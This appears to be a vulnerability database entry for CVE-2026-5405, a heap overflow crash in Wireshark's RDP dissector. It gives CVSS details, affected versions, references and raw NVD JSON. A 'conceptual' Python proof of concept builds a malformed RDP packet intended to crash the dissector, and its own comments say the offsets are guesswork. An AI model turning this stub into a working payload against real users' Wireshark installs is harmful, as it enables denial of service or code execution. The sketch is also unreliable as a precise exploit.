CVE-2026-5405

Description

RDP protocol dissector crash in Wireshark 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service and possible code execution

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE

Wireshark 4.6.0 - 4.6.4

Wireshark 4.4.0 - 4.4.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# Conceptual PoC for CVE-2026-5405
# This script attempts to generate a malformed packet that triggers the RDP dissector crash.
# Note: Specific offsets and malformed data structure depend on the actual upstream patch.

def create_malformed_rdp_packet():
    # RDP Connection Request PDU header structure
    # TPKT Header (4 bytes): Version, Reserved, Length
    tpkt_header = b"\x03\x00" + struct.pack(">H", 0x0010) 
    
    # X.224 Connection Request (variable)
    # Intentionally setting an invalid length to trigger buffer over-read
    x224_data = b"\xe0\x00\x00\x00" + b"A" * 100  
    
    return tpkt_header + x224_data

# In a real attack scenario, this packet would be sent to a target
# or saved to a pcap file which is then opened by the victim.
payload = create_malformed_rdp_packet()
print(f"Generated malformed payload length: {len(payload)}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5405
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5405
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5405/
[4] VulDB https://vuldb.com/cve/CVE-2026-5405
[5] https://gitlab.com/wireshark/wireshark/-/issues/21105
[6] https://www.wireshark.org/security/wnpa-sec-2026-17.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5405", "sourceIdentifier": "[email protected]", "published": "2026-05-01T00:16:24.963", "lastModified": "2026-05-04T20:16:20.830", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "RDP protocol dissector crash in Wireshark 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service and possible code execution"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.15", "matchCriteriaId": "8EAFFA8A-B5D8-4784-851E-E1B682871495"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6.0", "versionEndExcluding": "4.6.5", "matchCriteriaId": "1D804272-AD4D-4454-9629-1BBAA825D7C4"}]}]}], "references": [{"url": "https://gitlab.com/wireshark/wireshark/-/issues/21105", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://www.wireshark.org/security/wnpa-sec-2026-17.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}